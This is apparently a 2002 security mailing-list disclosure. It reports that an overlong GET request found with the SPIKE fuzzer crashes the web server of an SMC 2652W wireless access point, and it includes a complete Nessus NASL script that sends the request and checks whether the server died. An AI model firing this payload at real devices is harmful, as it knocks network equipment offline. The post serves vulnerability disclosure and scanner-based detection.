From: foo Dikator (f00dikator_at_yahoo.com)
Date: Tue Oct 08 2002 - 19:06:35 CDT
dies with
./closed_source_web_server_fuzz ip 80 GET / index1 .htm 0 57
which translates to this (for nessus/nasl users out there):
# this crashes the SMC 2652W WLAN Access Point webserver
# found with SPIKE 2.7
port = 80;
# build the request: a 240-byte file name followed by the header set SPIKE sent
req = string("GET /", crap(240), ".html?OpenElement&FieldElemFormat=gif HTTP/1.1\r\n");
req = string(req, "Referer: http://localhost/bob\r\n");
req = string(req, "Content-Type: application/x-www-form-urlencoded\r\n");
req = string(req, "Connection: Keep-Alive\r\n");
req = string(req, "Cookie: VARIABLE=DAVEAITEL; path=/\r\n");
req = string(req, "User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)\r\n");
req = string(req, "Variable: result\r\n");
req = string(req, "Host: localhost\r\nContent-length: 13\r\n");
req = string(req, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png\r\n");
req = string(req, "Accept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n");
# send the request; if the port was never reachable there is nothing to test
soc = open_sock_tcp(port);
if (!soc) exit(0);
send(socket:soc, data:req);
close(soc);
# reconnect: a refused connection or an empty reply means the web server died
soc = open_sock_tcp(port);
if (!soc) { security_hole(port); exit(0); }
req = string("GET / HTTP/1.0\r\n\r\n");
send(socket:soc, data:req);
bling = recv(socket:soc, length:1024, timeout:5);
close(soc);
if (!bling) security_hole(port);